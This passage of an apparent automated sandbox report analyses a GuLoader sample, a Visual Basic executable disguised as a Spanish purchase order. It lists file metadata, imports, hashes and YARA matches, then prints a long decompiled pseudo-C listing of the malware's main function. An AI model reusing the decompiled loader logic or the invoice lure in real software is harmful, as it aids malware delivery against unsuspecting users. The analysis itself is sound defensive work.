.rsrc	0x31000	0x984	0x1000	False	0.177490234375	data	2.09868199866	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x31854	0x130	data
RT_ICON	0x3156c	0x2e8	data
RT_ICON	0x31444	0x128	GLS_BINARY_LSB_FIRST
RT_GROUP_ICON	0x31414	0x30	data
RT_VERSION	0x31150	0x2c4	data	English	United States

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaStrCat, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryDestruct, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, __vbaAryConstruct2, __vbaObjVar, DllFunctionCall, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaStrToAnsi, __vbaLateMemCallLd, _CIatan, __vbaStrMove, __vbaCastObj, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

Version Infos

Description	Data
Translation	0x0409 0x04b0
LegalCopyright	CInc.
InternalName	samm
FileVersion	1.00
CompanyName	Jummes
LegalTrademarks	CInc.
Comments	Jummes
ProductName	Jummes
ProductVersion	1.00
FileDescription	Jummes
OriginalFilename	samm.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

System Behavior

Analysis Process: Pedido N#U00famero 4432003039.exe PID: 6236 Parent PID: 5720

General

Start time:	08:19:24
Start date:	14/06/2021
Path:	C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Pedido N#U00famero 4432003039.exe'
Imagebase:	0x400000
File size:	204800 bytes
MD5 hash:	D7C368F0C65C2A8C565DF3815E70EF9E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.764314852.0000000002AD0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Pedido N#U00famero 4432003039.exe PID: 6236 Parent PID: 5720 Pedido N#U00famero 4432003039.exeCOMMON

Executed Functions

Function 02AD559D, Relevance: 12.8, APIs: 1, Strings: 6, Instructions: 593memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 02AD5838

Strings

ekh, xrefs: 02AD4686
7X?b, xrefs: 02AD4583
@, xrefs: 02AD07C9
Bvu, xrefs: 02AD4467
y, xrefs: 02AD072A
oB}, xrefs: 02AD41F3

Memory Dump Source

Source File: 00000000.00000002.764314852.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID: 7X?b$@$Bvu$oB}$y$ekh
API String ID: 2167126740-3802085915
Opcode ID: 9b0923870be7654a531c38e6f36ad84f7dfeba80e738aea00f0406c4094232e6
Instruction ID: 2cc8a6c92d857132ae0de609e870030262b1053a7ad26ade0fc2fc619c5d949c
Opcode Fuzzy Hash: 9b0923870be7654a531c38e6f36ad84f7dfeba80e738aea00f0406c4094232e6
Instruction Fuzzy Hash: F412D1B29982809BEB115B2059F53DFBFA5DF8B374FAA008ADC855BA05C72D8841D731

Uniqueness

Uniqueness Score: -1.00%

Function 02AD55A5, Relevance: 1.8, APIs: 1, Instructions: 347memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL ref: 02AD5838

Memory Dump Source

Source File: 00000000.00000002.764314852.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: f9f53aa6eb63302a7b618f14ca591d0e608058bf61c40f91b8b4d8bee85dca3b
Instruction ID: a4922797860afca69d388cc1312cb9bf1289d75f4b5de8157f66b6786f239250
Opcode Fuzzy Hash: f9f53aa6eb63302a7b618f14ca591d0e608058bf61c40f91b8b4d8bee85dca3b
Instruction Fuzzy Hash: E4C1F4939981C097EF15072064FA3DBBFA9DF8F174BBA00CAD8855BE46C71D8940A731

Uniqueness

Uniqueness Score: -1.00%

Function 0042B824, Relevance: 248.0, APIs: 136, Strings: 5, Instructions: 1279
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E0042B824(signed int _a4, intOrPtr _a678) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				char _v52;
				char _v64;
				char _v68;
				char _v96;
				char _v104;
				char _v108;
				char _v116;
				char _v120;
				char _v144;
				char _v152;
				char _v160;
				char _v164;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				char _v228;
				intOrPtr _v236;
				char _v244;
				intOrPtr _v252;
				char _v260;
				intOrPtr _v268;
				char _v276;
				intOrPtr _v284;
				char _v292;
				intOrPtr _v300;
				char _v308;
				char _v360;
				char _v364;
				char _v368;
				char _v372;
				char _v376;
				char _v380;
				char _v384;
				char* _t333;
				char* _t337;
				intOrPtr* _t340;
				intOrPtr* _t342;
				void* _t344;
				intOrPtr* _t345;
				intOrPtr* _t347;
				void* _t349;
				intOrPtr* _t350;
				intOrPtr* _t352;
				void* _t354;
				char* _t355;
				char* _t356;
				char* _t366;
				intOrPtr* _t370;
				intOrPtr* _t372;
				void* _t374;
				char* _t376;
				void* _t378;
				intOrPtr* _t381;
				intOrPtr* _t383;
				void* _t385;
				intOrPtr* _t389;
				intOrPtr* _t391;
				void* _t393;
				intOrPtr* _t394;
				intOrPtr* _t396;
				intOrPtr* _t398;
				void* _t400;
				intOrPtr* _t401;
				intOrPtr* _t403;
				void* _t405;
				intOrPtr* _t406;
				intOrPtr* _t410;
				intOrPtr* _t412;
				void* _t414;
				intOrPtr* _t416;
				intOrPtr* _t418;
				void* _t420;
				intOrPtr* _t421;
				intOrPtr* _t423;
				void* _t425;
				intOrPtr* _t426;
				intOrPtr* _t428;
				void* _t430;
				intOrPtr* _t431;
				intOrPtr* _t433;
				void* _t435;
				char* _t437;
				void* _t438;
				intOrPtr* _t449;
				intOrPtr* _t451;
				void* _t453;
				void* _t455;
				intOrPtr* _t456;
				intOrPtr* _t458;
				void* _t460;
				intOrPtr* _t461;
				intOrPtr* _t463;
				void* _t465;
				void* _t468;
				intOrPtr* _t473;
				intOrPtr* _t475;
				void* _t477;
				intOrPtr* _t478;
				intOrPtr* _t480;
				void* _t482;
				intOrPtr* _t483;
				intOrPtr* _t485;
				void* _t487;
				void* _t491;
				void* _t495;
				void* _t502;
				intOrPtr* _t503;
				void* _t504;
				intOrPtr* _t505;
				intOrPtr* _t507;
				void* _t509;
				intOrPtr* _t511;
				intOrPtr* _t513;
				void* _t515;
				void* _t517;
				intOrPtr* _t518;
				void* _t519;
				intOrPtr* _t522;
				intOrPtr* _t524;
				void* _t526;
				void* _t528;
				intOrPtr* _t529;
				void* _t530;
				char* _t533;
				char* _t534;
				void* _t535;
				void* _t537;
				char* _t550;
				char* _t583;
				char* _t592;
				char* _t604;
				void* _t636;
				void* _t640;
				signed int _t641;
				signed int _t642;
				void* _t644;
				intOrPtr* _t645;
				intOrPtr _t647;
				void* _t649;
				void* _t651;
				intOrPtr* _t654;
				intOrPtr* _t655;
				intOrPtr* _t656;
				intOrPtr* _t659;
				intOrPtr* _t660;
				intOrPtr* _t661;
				intOrPtr* _t662;
				intOrPtr* _t663;
				intOrPtr* _t664;
				intOrPtr* _t665;
				intOrPtr* _t666;
				intOrPtr* _t667;
				intOrPtr* _t668;
				intOrPtr* _t670;
				intOrPtr* _t671;
				intOrPtr* _t672;
				intOrPtr* _t673;
				intOrPtr* _t674;
				intOrPtr* _t675;
				intOrPtr* _t676;
				signed int _t677;
				void* _t678;
				intOrPtr* _t679;
				intOrPtr* _t680;
				intOrPtr* _t681;
				intOrPtr* _t683;
				intOrPtr* _t684;
				intOrPtr* _t685;
				intOrPtr* _t686;
				intOrPtr* _t687;
				intOrPtr* _t688;
				intOrPtr* _t689;
				intOrPtr _t690;
				intOrPtr _t691;
				void* _t692;
				void* _t693;
				long long* _t694;
				void* _t695;
				void* _t696;
				intOrPtr* _t697;
				long long* _t698;
				long long* _t699;
				void* _t701;
				void* _t702;
				intOrPtr _t714;
				intOrPtr _t719;
				intOrPtr _t722;
				intOrPtr _t726;

				 *[fs:0x0] = _t690;
				_t691 = _t690 - 0x1cc;
				_v16 = _t691;
				_v12 = 0x401158;
				_t641 = _a4;
				_v8 = _t641 & 0x00000001;
				_t642 = _t641 & 0xfffffffe;
				_a4 = _t642;
				 *((intOrPtr*)( *_t642 + 4))(_t642, _t640, _t651, _t537,  *[fs:0x0], 0x4011b6);
				_push(3);
				_push(0x42b270);
				_push( &_v96);
				_v28 = 0;
				_v52 = 0;
				_v64 = 0;
				_v68 = 0;
				_v104 = 0;
				_v108 = 0;
				_v116 = 0;
				_v120 = 0;
				_v152 = 0;
				_v160 = 0;
				_v164 = 0;
				_v172 = 0;
				_v176 = 0;
				_v180 = 0;
				_v184 = 0;
				_v188 = 0;
				_v192 = 0;
				_v196 = 0;
				_v200 = 0;
				_v204 = 0;
				_v208 = 0;
				_v212 = 0;
				_v216 = 0;
				_v220 = 0;
				_v224 = 0;
				_v228 = 0;
				_v244 = 0;
				_v260 = 0;
				_v276 = 0;
				_v292 = 0;
				_v308 = 0;
				_v360 = 0;
				_v364 = 0;
				_v368 = 0;
				_v372 = 0;
				_v376 = 0;
				_v380 = 0;
				_v384 = 0;
				L00401348();
				_push(0x11);
				_push(0x42b28c);
				_t333 =  &_v144;
				_push(_t333);
				L00401348();
				_push(0x42b0c8);
				_push(0x42b0c8);
				L00401336();
				_v236 = _t333;
				_push(1);
				_push( &_v244);
				_push( &_v260);
				_v244 = 8;
				L0040133C();
				_push( &_v260);
				_t337 =  &_v308;
				_v300 = 0x42b0c8;
				_v308 = 0x8008;
				_push(_t337);
				L00401342();
				_push( &_v260);
				_push( &_v244);
				_push(2);
				L00401330();
				_t692 = _t691 + 0xc;
				if(_t337 != 0) {
					L0040132A();
					_push( &_v244);
					_v236 = 0x80020004;
					_v244 = 0xa;
					L00401324();
					L0040131E();
					_push(1);
					_push(L"Smaaartikler4");
					L00401318();
				}
				_t340 =  *0x430010; // 0x4df9f8
				if(_t340 == 0) {
					_push(0x430010);
					_push(0x42a01c);
					L0040130C();
					_t340 =  *0x430010; // 0x4df9f8
				}
				_t342 =  &_v208;
				L00401312();
				_t654 = _t342;
				_t344 =  *((intOrPtr*)( *_t654 + 0x128))(_t654, _t342,  *((intOrPtr*)( *_t340 + 0x338))(_t340));
				asm("fclex");
				if(_t344 < 0) {
					_push(0x128);
					_push(0x42b0ec);
					_push(_t654);
					_push(_t344);
					L00401306();
				}
				L00401300();
				_t345 =  *0x430010; // 0x4df9f8
				if(_t345 == 0) {
					_push(0x430010);
					_push(0x42a01c);
					L0040130C();
					_t345 =  *0x430010; // 0x4df9f8
				}
				_t347 =  &_v208;
				L00401312();
				_t655 = _t347;
				_t349 =  *((intOrPtr*)( *_t655 + 0xe8))(_t655,  &_v188, _t347,  *((intOrPtr*)( *_t345 + 0x334))(_t345));
				asm("fclex");
				if(_t349 < 0) {
					_push(0xe8);
					_push(0x42b0fc);
					_push(_t655);
					_push(_t349);
					L00401306();
				}
				_t350 =  *0x430010; // 0x4df9f8
				if(_t350 == 0) {
					_push(0x430010);
					_push(0x42a01c);
					L0040130C();
					_t350 =  *0x430010; // 0x4df9f8
				}
				_t352 =  &_v212;
				L00401312();
				_t656 = _t352;
				_t354 =  *((intOrPtr*)( *_t656 + 0x108))(_t656,  &_v192, _t352,  *((intOrPtr*)( *_t350 + 0x30c))(_t350));
				asm("fclex");
				if(_t354 < 0) {
					_push(0x108);
					_push(0x42b10c);
					_push(_t656);
					_push(_t354);
					L00401306();
				}
				_push(0);
				_push(_v192);
				_t355 =  &_v200;
				_push(_t355);
				L004012FA();
				_push(_t355);
				_push(_v188);
				_t356 =  &_v196;
				_push(_t356);
				L004012FA();
				_push(_t356);
				E0042AE50();
				_v376 = _t356;
				L004012F4();
				_push( &_v200);
				_push( &_v192);
				_push( &_v196);
				_push( &_v188);
				_push(4);
				L004012EE();
				_push( &_v212);
				_push( &_v208);
				_push(2);
				L004012E8();
				_t693 = _t692 + 0x20;
				if( ~(0 | _v376 == 0x00001a09) != 0) {
					_t511 =  *0x430010; // 0x4df9f8
					if(_t511 == 0) {
						_push(0x430010);
						_push(0x42a01c);
						L0040130C();
						_t511 =  *0x430010; // 0x4df9f8
					}
					_t513 =  &_v208;
					L00401312();
					_t683 = _t513;
					_t515 =  *((intOrPtr*)( *_t683 + 0x48))(_t683,  &_v188, _t513,  *((intOrPtr*)( *_t511 + 0x2fc))(_t511));
					asm("fclex");
					if(_t515 < 0) {
						_push(0x48);
						_push(0x42b11c);
						_push(_t683);
						_push(_t515);
						L00401306();
					}
					_t714 =  *0x430340; // 0x218e8b4
					if(_t714 != 0) {
						_t649 = 0x42af8c;
					} else {
						_push(0x430340);
						_t649 = 0x42af8c;
						_push(0x42af8c);
						L0040130C();
					}
					_t684 =  *0x430340; // 0x218e8b4
					_t517 =  *((intOrPtr*)( *_t684 + 0x14))(_t684,  &_v212);
					asm("fclex");
					if(_t517 < 0) {
						_push(0x14);
						_push(0x42b13c);
						_push(_t684);
						_push(_t517);
						L00401306();
					}
					_t518 = _v212;
					_t685 = _t518;
					_t519 =  *((intOrPtr*)( *_t518 + 0x138))(_t518, _v188, 1);
					asm("fclex");
					if(_t519 < 0) {
						_push(0x138);
						_push(0x42ac4c);
						_push(_t685);
						_push(_t519);
						L00401306();
					}
					L004012E2();
					_push( &_v212);
					_push( &_v208);
					_push(2);
					L004012E8();
					_t522 =  *0x430010; // 0x4df9f8
					_t701 = _t693 + 0xc;
					if(_t522 == 0) {
						_push(0x430010);
						_push(0x42a01c);
						L0040130C();
						_t522 =  *0x430010; // 0x4df9f8
					}
					_t524 =  &_v208;
					L00401312();
					_t686 = _t524;
					_t526 =  *((intOrPtr*)( *_t686 + 0x48))(_t686,  &_v188, _t524,  *((intOrPtr*)( *_t522 + 0x308))(_t522));
					asm("fclex");
					if(_t526 < 0) {
						_push(0x48);
						_push(0x42b10c);
						_push(_t686);
						_push(_t526);
						L00401306();
					}
					_t719 =  *0x430340; // 0x218e8b4
					if(_t719 == 0) {
						_push(0x430340);
						_push(_t649);
						L0040130C();
					}
					_t687 =  *0x430340; // 0x218e8b4
					_t528 =  *((intOrPtr*)( *_t687 + 0x14))(_t687,  &_v212);
					asm("fclex");
					if(_t528 < 0) {
						_push(0x14);
						_push(0x42b13c);
						_push(_t687);
						_push(_t528);
						L00401306();
					}
					_t529 = _v212;
					_t688 = _t529;
					_t530 =  *((intOrPtr*)( *_t529 + 0x138))(_t529, _v188, 1);
					asm("fclex");
					if(_t530 < 0) {
						_push(0x138);
						_push(0x42ac4c);
						_push(_t688);
						_push(_t530);
						L00401306();
					}
					L004012E2();
					_push( &_v212);
					_push( &_v208);
					_push(2);
					L004012E8();
					_t702 = _t701 + 0xc;
					_t722 =  *0x430340; // 0x218e8b4
					if(_t722 == 0) {
						_push(0x430340);
						_push(_t649);
						L0040130C();
					}
					_t689 =  *0x430340; // 0x218e8b4
					_t533 =  &_v244;
					L004012D0();
					_t693 = _t702 + 0x10;
					L004012D6();
					_t534 =  &_v208;
					L004012DC();
					_t535 =  *((intOrPtr*)( *_t689 + 0xc))(_t689, _t534, _t534, _t533, _t533, _t533, _v120, L"jHCw1jHImJpY116", 0);
					asm("fclex");
					if(_t535 < 0) {
						_push(0xc);
						_push(0x42b13c);
						_push(_t689);
						_push(_t535);
						L00401306();
					}
					L00401300();
					L0040131E();
					_t642 = _a4;
				}
				_push(L"Mariamman");
				_t366 =  &_v188;
				_push(_t366);
				L004012FA();
				_push(_t366);
				E0042AEA4();
				_v376 = _t366;
				L004012F4();
				L004012E2();
				if( ~(0 | _v376 == 0x000015b2) != 0) {
					_t726 =  *0x430340; // 0x218e8b4
					if(_t726 == 0) {
						_push(0x430340);
						_push(0x42af8c);
						L0040130C();
					}
					_t679 =  *0x430340; // 0x218e8b4
					_t502 =  *((intOrPtr*)( *_t679 + 0x14))(_t679,  &_v208);
					asm("fclex");
					if(_t502 < 0) {
						_push(0x14);
						_push(0x42b13c);
						_push(_t679);
						_push(_t502);
						L00401306();
					}
					_t503 = _v208;
					_t680 = _t503;
					_t504 =  *((intOrPtr*)( *_t503 + 0x60))(_t503,  &_v188);
					asm("fclex");
					if(_t504 < 0) {
						_push(0x60);
						_push(0x42ac4c);
						_push(_t680);
						_push(_t504);
						L00401306();
					}
					_v188 = 0;
					L004012CA();
					L00401300();
					_push(0);
					_push(0);
					_push(1);
					L004012C4();
					L004012CA();
					_t505 =  *0x430010; // 0x4df9f8
					if(_t505 == 0) {
						_push(0x430010);
						_push(0x42a01c);
						L0040130C();
						_t505 =  *0x430010; // 0x4df9f8
					}
					_t507 =  &_v208;
					L00401312();
					_t681 = _t507;
					_t509 =  *((intOrPtr*)( *_t681 + 0x198))(_t681,  &_v188, _t507,  *((intOrPtr*)( *_t505 + 0x334))(_t505));
					asm("fclex");
					if(_t509 < 0) {
						_push(0x198);
						_push(0x42b0fc);
						_push(_t681);
						_push(_t509);
						L00401306();
					}
					_push(0);
					_push(_v188);
					_push( &_v244);
					L004012B8();
					_t693 = _t693 - 0x10;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(0);
					_push(_v184);
					asm("movsd");
					L004012BE();
					L004012E2();
					L00401300();
					L0040131E();
					_t642 = _a4;
				}
				_t370 =  *0x430010; // 0x4df9f8
				if(_t370 == 0) {
					_push(0x430010);
					_push(0x42a01c);
					L0040130C();
					_t370 =  *0x430010; // 0x4df9f8
				}
				_t372 =  &_v208;
				L00401312();
				_t659 = _t372;
				_t374 =  *((intOrPtr*)( *_t659 + 0x178))(_t659,  &_v212, _t372,  *((intOrPtr*)( *_t370 + 0x318))(_t370));
				asm("fclex");
				if(_t374 < 0) {
					_push(0x178);
					_push(0x42b10c);
					_push(_t659);
					_push(_t374);
					L00401306();
				}
				L004012B2();
				_t694 = _t693 + 0x10;
				_t376 =  &_v244;
				L004012AC();
				_t550 =  &_v364;
				 *_t694 =  *0x401150;
				_v376 = _t376;
				_v364 = 0xfc;
				_v360 = 0xe3;
				_t378 =  *((intOrPtr*)( *_t642 + 0x6fc))(_t642,  &_v360, _t550, _t550, _t550, 0x6558,  &_v376,  &_v380, _t376,  &_v244, _v212, 0, 0);
				if(_t378 < 0) {
					_push(0x6fc);
					_push(0x42ac10);
					_push(_t642);
					_push(_t378);
					L00401306();
				}
				_push( &_v212);
				_push( &_v208);
				_push(2);
				L004012E8();
				_t695 = _t694 + 0xc;
				L0040131E();
				_t381 =  *0x430010; // 0x4df9f8
				if(_t381 == 0) {
					_push(0x430010);
					_push(0x42a01c);
					L0040130C();
					_t381 =  *0x430010; // 0x4df9f8
				}
				_t383 =  &_v208;
				L00401312();
				_t660 = _t383;
				_t385 =  *((intOrPtr*)( *_t660 + 0xa0))(_t660,  &_v360, _t383,  *((intOrPtr*)( *_t381 + 0x310))(_t381));
				asm("fclex");
				if(_t385 < 0) {
					_push(0xa0);
					_push(0x42b10c);
					_push(_t660);
					_push(_t385);
					L00401306();
				}
				_v364 = _v360;
				 *((intOrPtr*)( *_t642 + 0x704))(_t642,  &_v364, L"AMPHORAL");
				L00401300();
				_t389 =  *0x430010; // 0x4df9f8
				if(_t389 == 0) {
					_push(0x430010);
					_push(0x42a01c);
					L0040130C();
					_t389 =  *0x430010; // 0x4df9f8
				}
				_t391 =  &_v208;
				L00401312();
				_t661 = _t391;
				_t393 =  *((intOrPtr*)( *_t661 + 0x1a0))(_t661,  &_v376, _t391,  *((intOrPtr*)( *_t389 + 0x30c))(_t389));
				asm("fclex");
				if(_t393 < 0) {
					_push(0x1a0);
					_push(0x42b10c);
					_push(_t661);
					_push(_t393);
					L00401306();
				}
				_t394 = _a4;
				_v380 =  *0x401148;
				 *((intOrPtr*)( *_t394 + 0x708))(_t394,  &_v380, _v376, 0xd0ffa920, 0x5b05,  &_v360);
				L00401300();
				_t396 =  *0x430010; // 0x4df9f8
				if(_t396 == 0) {
					_push(0x430010);
					_push(0x42a01c);
					L0040130C();
					_t396 =  *0x430010; // 0x4df9f8
				}
				_t398 =  &_v208;
				L00401312();
				_t662 = _t398;
				_t400 =  *((intOrPtr*)( *_t662 + 0x78))(_t662,  &_v376, _t398,  *((intOrPtr*)( *_t396 + 0x330))(_t396));
				asm("fclex");
				if(_t400 < 0) {
					_push(0x78);
					_push(0x42b0fc);
					_push(_t662);
					_push(_t400);
					L00401306();
				}
				_t401 =  *0x430010; // 0x4df9f8
				if(_t401 == 0) {
					_push(0x430010);
					_push(0x42a01c);
					L0040130C();
					_t401 =  *0x430010; // 0x4df9f8
				}
				_t403 =  &_v212;
				L00401312();
				_t663 = _t403;
				_t405 =  *((intOrPtr*)( *_t663 + 0x60))(_t663,  &_v380, _t403,  *((intOrPtr*)( *_t401 + 0x314))(_t401));
				asm("fclex");
				if(_t405 < 0) {
					_push(0x60);
					_push(0x42b10c);
					_push(_t663);
					_push(_t405);
					L00401306();
				}
				_t406 = _a4;
				_v384 = _v376;
				 *((intOrPtr*)( *_t406 + 0x708))(_t406,  &_v384, _v380, 0xf66cf00, 0x5b05,  &_v360);
				_push( &_v212);
				_push( &_v208);
				_push(2);
				L004012E8();
				_t410 =  *0x430010; // 0x4df9f8
				_t696 = _t695 + 0xc;
				if(_t410 == 0) {
					_push(0x430010);
					_push(0x42a01c);
					L0040130C();
					_t410 =  *0x430010; // 0x4df9f8
				}
				_t412 =  &_v208;
				L00401312();
				_t664 = _t412;
				_t414 =  *((intOrPtr*)( *_t664 + 0x178))(_t664,  &_v212, _t412,  *((intOrPtr*)( *_t410 + 0x2fc))(_t410));
				asm("fclex");
				if(_t414 < 0) {
					_push(0x178);
					_push(0x42b11c);
					_push(_t664);
					_push(_t414);
					L00401306();
				}
				_push(0);
				_push(0);
				_push(_v212);
				_push( &_v244); // executed
				L004012B2();
				_t416 =  *0x430010; // 0x4df9f8
				_t697 = _t696 + 0x10;
				if(_t416 != 0) {
					_t644 = 0x42a01c;
				} else {
					_push(0x430010);
					_t644 = 0x42a01c;
					_push(0x42a01c);
					L0040130C();
					_t416 =  *0x430010; // 0x4df9f8
				}
				_t418 =  &_v216;
				L00401312();
				_t665 = _t418;
				_t420 =  *((intOrPtr*)( *_t665 + 0x68))(_t665,  &_v376, _t418,  *((intOrPtr*)( *_t416 + 0x338))(_t416));
				asm("fclex");
				if(_t420 < 0) {
					_push(0x68);
					_push(0x42b0ec);
					_push(_t665);
					_push(_t420);
					L00401306();
				}
				_t421 =  *0x430010; // 0x4df9f8
				if(_t421 == 0) {
					_push(0x430010);
					_push(_t644);
					L0040130C();
					_t421 =  *0x430010; // 0x4df9f8
				}
				_t423 =  &_v220;
				L00401312();
				_t666 = _t423;
				_t425 =  *((intOrPtr*)( *_t666 + 0xf0))(_t666,  &_v188, _t423,  *((intOrPtr*)( *_t421 + 0x334))(_t421));
				asm("fclex");
				if(_t425 < 0) {
					_push(0xf0);
					_push(0x42b0fc);
					_push(_t666);
					_push(_t425);
					L00401306();
				}
				_t426 =  *0x430010; // 0x4df9f8
				if(_t426 == 0) {
					_push(0x430010);
					_push(_t644);
					L0040130C();
					_t426 =  *0x430010; // 0x4df9f8
				}
				_t428 =  &_v224;
				L00401312();
				_t667 = _t428;
				_t430 =  *((intOrPtr*)( *_t667 + 0x50))(_t667,  &_v192, _t428,  *((intOrPtr*)( *_t426 + 0x310))(_t426));
				asm("fclex");
				if(_t430 < 0) {
					_push(0x50);
					_push(0x42b10c);
					_push(_t667);
					_push(_t430);
					L00401306();
				}
				_t431 =  *0x430010; // 0x4df9f8
				if(_t431 == 0) {
					_push(0x430010);
					_push(_t644);
					L0040130C();
					_t431 =  *0x430010; // 0x4df9f8
				}
				_t433 =  &_v228;
				L00401312();
				_t668 = _t433;
				_t435 =  *((intOrPtr*)( *_t668 + 0xa0))(_t668,  &_v196, _t433,  *((intOrPtr*)( *_t431 + 0x334))(_t431));
				asm("fclex");
				if(_t435 < 0) {
					_push(0xa0);
					_push(0x42b0fc);
					_push(_t668);
					_push(_t435);
					L00401306();
				}
				_v196 = 0;
				L004012CA();
				_t645 = _a4;
				_t437 =  &_v244;
				 *_t697 = _v376;
				L004012A6();
				L004012CA();
				_t438 =  *((intOrPtr*)( *_t645 + 0x6f8))(_t645, _t437, _t437,  &_v204, _v188, _v192,  &_v204);
				if(_t438 < 0) {
					_push(0x6f8);
					_push(0x42ac10);
					_push(_t645);
					_push(_t438);
					L00401306();
				}
				_push( &_v204);
				_push( &_v192);
				_push( &_v188);
				_push( &_v200);
				_push(4);
				L004012EE();
				_push( &_v212);
				_push( &_v228);
				_push( &_v224);
				_push( &_v220);
				_push( &_v216);
				_push( &_v208);
				_push(6);
				L004012E8();
				_t698 = _t697 + 0x30;
				L0040131E();
				_t449 =  *0x430010; // 0x4df9f8
				if(_t449 == 0) {
					_push(0x430010);
					_push(0x42a01c);
					L0040130C();
					_t449 =  *0x430010; // 0x4df9f8
				}
				_t451 =  &_v208;
				L00401312();
				_t670 = _t451;
				_t453 =  *((intOrPtr*)( *_t670 + 0xe0))(_t670,  &_v360, _t451,  *((intOrPtr*)( *_t449 + 0x2fc))(_t449));
				asm("fclex");
				if(_t453 < 0) {
					_push(0xe0);
					_push(0x42b11c);
					_push(_t670);
					_push(_t453);
					L00401306();
				}
				_t583 =  &_v368;
				 *_t698 =  *0x401140;
				_v376 = 0x2be54;
				_v368 = 0xad9;
				_v364 = 0x83c;
				_t455 =  *((intOrPtr*)( *_t645 + 0x6fc))(_t645,  &_v364, _t583, _t583, _t583, _v360,  &_v376,  &_v380);
				if(_t455 < 0) {
					_push(0x6fc);
					_push(0x42ac10);
					_push(_a4);
					_push(_t455);
					L00401306();
				}
				L00401300();
				_t456 =  *0x430010; // 0x4df9f8
				if(_t456 == 0) {
					_push(0x430010);
					_push(0x42a01c);
					L0040130C();
					_t456 =  *0x430010; // 0x4df9f8
				}
				_t458 =  &_v208;
				L00401312();
				_t671 = _t458;
				_t460 =  *((intOrPtr*)( *_t671 + 0x98))(_t671,  &_v360, _t458,  *((intOrPtr*)( *_t456 + 0x324))(_t456));
				asm("fclex");
				if(_t460 < 0) {
					_push(0x98);
					_push(0x42b19c);
					_push(_t671);
					_push(_t460);
					L00401306();
				}
				_t461 =  *0x430010; // 0x4df9f8
				if(_t461 == 0) {
					_push(0x430010);
					_push(0x42a01c);
					L0040130C();
					_t461 =  *0x430010; // 0x4df9f8
				}
				_t463 =  &_v212;
				L00401312();
				_t672 = _t463;
				_t465 =  *((intOrPtr*)( *_t672 + 0xb8))(_t672,  &_v364, _t463,  *((intOrPtr*)( *_t461 + 0x324))(_t461));
				asm("fclex");
				if(_t465 < 0) {
					_push(0xb8);
					_push(0x42b19c);
					_push(_t672);
					_push(_t465);
					L00401306();
				}
				_t673 = _a4;
				_t592 =  &_v372;
				 *_t698 =  *0x401138;
				_v372 = _v360;
				_v376 = 0x684fff;
				_v368 = 0x10b1;
				_t468 =  *((intOrPtr*)( *_t673 + 0x6fc))(_t673,  &_v368, _t592, _t592, _t592, _v364,  &_v376,  &_v380);
				if(_t468 < 0) {
					_push(0x6fc);
					_push(0x42ac10);
					_push(_t673);
					_push(_t468);
					L00401306();
				}
				L004012E8();
				_v376 =  *0x401130;
				_t699 = _t698 + 0xc;
				 *((intOrPtr*)( *_t673 + 0x708))(_t673,  &_v376, 0x7d676c, 0x24a61260, 0x5af9,  &_v360, 2,  &_v208,  &_v212);
				_t473 =  *0x430010; // 0x4df9f8
				if(_t473 == 0) {
					_push(0x430010);
					_push(0x42a01c);
					L0040130C();
					_t473 =  *0x430010; // 0x4df9f8
				}
				_t475 =  &_v208;
				L00401312();
				_t674 = _t475;
				_t477 =  *((intOrPtr*)( *_t674 + 0x198))(_t674,  &_v360, _t475,  *((intOrPtr*)( *_t473 + 0x318))(_t473));
				asm("fclex");
				if(_t477 < 0) {
					_push(0x198);
					_push(0x42b10c);
					_push(_t674);
					_push(_t477);
					L00401306();
				}
				_t478 =  *0x430010; // 0x4df9f8
				if(_t478 == 0) {
					_push(0x430010);
					_push(0x42a01c);
					L0040130C();
					_t478 =  *0x430010; // 0x4df9f8
				}
				_t480 =  &_v212;
				L00401312();
				_t675 = _t480;
				_t482 =  *((intOrPtr*)( *_t675 + 0x178))(_t675,  &_v364, _t480,  *((intOrPtr*)( *_t478 + 0x320))(_t478));
				asm("fclex");
				if(_t482 < 0) {
					_push(0x178);
					_push(0x42b1ac);
					_push(_t675);
					_push(_t482);
					L00401306();
				}
				_t483 =  *0x430010; // 0x4df9f8
				if(_t483 == 0) {
					_push(0x430010);
					_push(0x42a01c);
